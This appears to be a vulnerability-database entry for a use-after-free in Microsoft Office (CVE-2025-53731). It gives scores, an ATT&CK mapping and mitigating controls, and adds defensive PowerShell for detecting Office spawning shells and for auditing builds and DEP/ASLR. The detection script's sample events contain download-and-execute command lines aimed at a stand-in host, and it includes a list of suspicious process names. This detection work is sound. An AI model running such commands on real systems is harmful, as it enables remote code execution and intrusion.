
CVE-2025-53731

Severity: High
Published: 12 August 2025
Modified: 15 August 2025
CISA KEV: not listed
CVSS v3.1 base score: 8.4 (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS score: 0.0141 (80.9th percentile)
Risk priority: 18 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-53731 is a high-severity use-after-free (CWE-416) vulnerability in Microsoft Office, affecting Microsoft 365 Apps, Office 2016 and 2019, and Office Long Term Servicing Channel 2021 and 2024. Its CVSS v3.1 base score is 8.4 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploitation for Client Execution (T1203). Its EPSS score places it in the top 19.1% of CVEs by predicted exploit likelihood, and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-16 (Memory Protection) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2025-53731 is a use-after-free (CWE-416) in Microsoft Office with a CVSS v3.1 base score of 8.4. The flaw lets an attacker execute arbitrary code on an affected system when the vulnerable component processes specially crafted content.

The vector string AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H scores the issue as locally exploitable with low complexity, requiring neither privileges nor user interaction, and with high impact on confidentiality, integrity and availability. Two points of interpretation matter for practitioners. First, AV:L follows Microsoft's long-standing convention for document-parsing flaws: the crafted content must be processed on the victim host, which in practice means getting a malicious file in front of the target rather than already holding a foothold on the machine. Second, C:H/I:H/A:H describes the affected component, not the whole host: for a client application this means code execution with the rights of the user running Office, which is a full compromise of that user's session and data.

The Microsoft Security Response Center advisory at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53731 provides official guidance on available patches and mitigation steps for supported Office versions.

The EPSS score of 0.0141 (roughly a 1.4% estimated probability of exploitation activity in the next 30 days) has not moved materially since publication. That is low in absolute terms, but it still sits above about 81% of all scored CVEs, so the vulnerability belongs in the normal patch cycle rather than being deferred.

Vulnerability details

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

CWE(s)

CWE-416: Use After Free

Related Threats

MITRE ATT&CK Enterprise Techniques

T1203 Exploitation for Client Execution (tactic: Execution)
Adversaries may exploit software vulnerabilities in client applications to execute code.
Why these techniques?

The use-after-free is triggered by crafted content handled by a client application (Office) and yields arbitrary code execution without privileges or user interaction, which is exactly what Exploitation for Client Execution describes.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1
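The memory-corruption step of T1203 itself leaves little in ordinary Windows telemetry, so the usual hunt is for its follow-on behaviour: an Office process spawning a shell or script interpreter. The script below is an added example, not part of the original page and not a Microsoft or vendor tool. It runs the check over a small set of constructed Sysmon-style process-creation records (not real telemetry); the field names (ParentImage, Image, CommandLine, UtcTime, Computer) follow Sysmon Event ID 1, and the lists of Office parents and suspicious children are the author's assumptions and should be tuned to the environment.

```powershell
# Added example: flag Office processes spawning shells or script hosts, the
# common follow-on to a successful T1203 document exploit.
# Sample events are constructed; in production, feed records from
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}
# through Find-OfficeSpawn after mapping the event XML into hashtables.

# Assumed lists; extend for Visio, Publisher, Teams, etc. as appropriate.
$OfficeParents = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe')
$SuspiciousChildren = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
                        'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe', 'bitsadmin.exe')

function Get-LeafName {
    # Portable basename: splits on either slash so it works under pwsh on any OS.
    param([string]$Path)
    return (($Path -split '[\\/]')[-1]).ToLowerInvariant()
}

function Test-OfficeSpawn {
    # True when an Office parent launches a child from the suspicious list.
    param([Parameter(Mandatory)][hashtable]$Event)
    $parent = Get-LeafName $Event.ParentImage
    $child  = Get-LeafName $Event.Image
    return ($OfficeParents -contains $parent) -and ($SuspiciousChildren -contains $child)
}

function Find-OfficeSpawn {
    # Emits one finding object per matching event.
    param([Parameter(Mandatory)][hashtable[]]$Events)
    foreach ($e in $Events) {
        if (Test-OfficeSpawn -Event $e) {
            [pscustomobject]@{
                Time        = $e.UtcTime
                Host        = $e.Computer
                Parent      = $e.ParentImage
                Child       = $e.Image
                CommandLine = $e.CommandLine
            }
        }
    }
}

# Constructed sample events (not real telemetry). Two should fire, two should not.
$sample = @(
    @{ UtcTime = '2025-08-13 09:14:02'; Computer = 'WS01'
       ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
       Image = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'cmd.exe /c powershell -nop -w hidden -c "iex (iwr http://example.invalid/p)"' },
    @{ UtcTime = '2025-08-13 09:14:05'; Computer = 'WS01'
       ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
       Image = 'C:\Windows\splwow64.exe'            # benign print helper, must not fire
       CommandLine = 'splwow64.exe 12288' },
    @{ UtcTime = '2025-08-13 09:20:11'; Computer = 'WS02'
       ParentImage = 'C:\Windows\explorer.exe'     # cmd from Explorer, not Office
       Image = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'cmd.exe' },
    @{ UtcTime = '2025-08-13 09:22:40'; Computer = 'WS02'
       ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
       Image = 'C:\Windows\System32\mshta.exe'
       CommandLine = 'mshta.exe http://example.invalid/a.hta' }
)

Find-OfficeSpawn -Events $sample | Format-Table -AutoSize
```

Parent/child matching on image names is deliberately simple and is the first thing an attacker living off the land will try to sidestep (for example by spawning via WMI or a COM server so the parent is not Office). Treat this as a baseline rule to layer with command-line and network-connection context, not as a complete detection for this CVE.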

CVEs Like This One

CVE-2025-24080 (same product: Microsoft 365 Apps)
CVE-2025-53740 (same product: Microsoft 365 Apps)
CVE-2026-20952 (same product: Microsoft 365 Apps)
CVE-2026-40358 (same product: Microsoft 365 Apps)
CVE-2025-21392 (same product: Microsoft 365 Apps)
CVE-2026-40366 (same product: Microsoft 365 Apps)
CVE-2025-21345 (same product: Microsoft 365 Apps)
CVE-2025-62557 (same product: Microsoft 365 Apps)
CVE-2026-40361 (same product: Microsoft 365 Apps)
CVE-2025-49695 (same product: Microsoft 365 Apps)

Affected Assets

Microsoft 365 Apps: all versions
Microsoft Office: 2016, 2019
Microsoft Office Long Term Servicing Channel: 2021, 2024

Mitigating Controls (NIST 800-53 r5)

SI-2 Flaw Remediation (prevent)

Directly requires timely patching and remediation of the use-after-free in Microsoft Office; this is the only control that removes the flaw rather than making it harder to exploit.

SI-16 Memory Protection (prevent)

Implements memory protection mechanisms such as ASLR and DEP. These do not stop the dangling-pointer reuse itself, but they raise the cost of turning a use-after-free into reliable code execution by denying predictable addresses and executable data pages.

SI-3 Malicious Code Protection (prevent, detect)

Deploys malicious code protection at entry points (mail gateway, web proxy, endpoint) to block or detect crafted Office documents that attempt to exploit the vulnerability.
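The SI-2 and SI-16 controls above both reduce to a question an administrator can answer on the endpoint: which Office build is installed, and are DEP and ASLR actually in force for the Office executables? The script below is an added example, not part of the original page and not Microsoft code. It reads the Click-to-Run configuration key, the file versions of the document-parsing executables, and the per-process mitigation policy via the built-in ProcessMitigations module. The fixed build numbers for CVE-2025-53731 are not given on this page, so the script reports the build for comparison against the MSRC advisory rather than deciding pass or fail itself; the install paths and executable list are assumptions for a default Click-to-Run layout.

```powershell
# Added example: report Office build/channel (SI-2 evidence) and DEP/ASLR/CFG
# state for Office executables (SI-16 evidence). Run elevated on the endpoint.
# Compare Build against the fixed builds listed in the MSRC advisory; this
# script does not embed them because they are not on the page it accompanies.

function Get-OfficeClickToRunInfo {
    # Click-to-Run installs (Microsoft 365 Apps, Office 2019, LTSC 2021/2024) record
    # their build here. MSI-based Office 2016 does not; use file versions for it.
    $key = 'HKLM:\SOFTWARE\Microsoft\Office\ClickToRun\Configuration'
    if (-not (Test-Path $key)) { return $null }
    $cfg = Get-ItemProperty -Path $key
    [pscustomobject]@{
        Build    = $cfg.VersionToReport
        Channel  = $cfg.UpdateChannel      # CDN URL identifying the update channel
        Platform = $cfg.Platform
        Products = $cfg.ProductReleaseIds
    }
}

function Get-OfficeBinaryVersions {
    # File versions of the executables that parse untrusted documents. Defaults
    # cover 64- and 32-bit Click-to-Run roots (assumed layout); MSI Office 2016
    # lives under C:\Program Files\Microsoft Office\Office16, so pass -Roots for it.
    param([string[]]$Roots = @(
        "$env:ProgramFiles\Microsoft Office\root\Office16",
        "${env:ProgramFiles(x86)}\Microsoft Office\root\Office16"))
    foreach ($root in $Roots) {
        foreach ($exe in 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE') {
            $path = Join-Path $root $exe
            if (Test-Path $path) {
                [pscustomobject]@{
                    File    = $path
                    Version = (Get-Item $path).VersionInfo.FileVersion
                }
            }
        }
    }
}

function Get-OfficeMitigationState {
    # Effective per-process mitigation policy (Windows 10 1709+ / Server 2019+).
    # Get-ProcessMitigation -Name merges the system defaults with any override
    # set for that executable via Set-ProcessMitigation or Exploit Protection.
    if (-not (Get-Command Get-ProcessMitigation -ErrorAction SilentlyContinue)) {
        Write-Warning 'ProcessMitigations module not available on this host.'
        return
    }
    foreach ($exe in 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe') {
        $m = Get-ProcessMitigation -Name $exe
        [pscustomobject]@{
            Process         = $exe
            DEP             = $m.Dep.Enable
            ASLRForceReloc  = $m.Aslr.ForceRelocateImages
            ASLRBottomUp    = $m.Aslr.BottomUp
            ASLRHighEntropy = $m.Aslr.HighEntropy
            CFG             = $m.Cfg.Enable
        }
    }
}

Get-OfficeClickToRunInfo
Get-OfficeBinaryVersions | Format-Table -AutoSize
Get-OfficeMitigationState | Format-Table -AutoSize
```

A value of NOTSET means the executable inherits the system default, which for DEP and ASLR is on for binaries linked with /NXCOMPAT and /DYNAMICBASE, as current Office builds are; what you are looking for is an explicit OFF, which would override that. If you want the policy enforced regardless of how a plug-in DLL was linked, Set-ProcessMitigation -Name winword.exe -Enable DEP,ForceRelocateImages,BottomUp,HighEntropy pins it per executable; test add-ins afterwards, since forced relocation can break older non-ASLR-aware components.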

References

Microsoft Security Response Center, CVE-2025-53731: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53731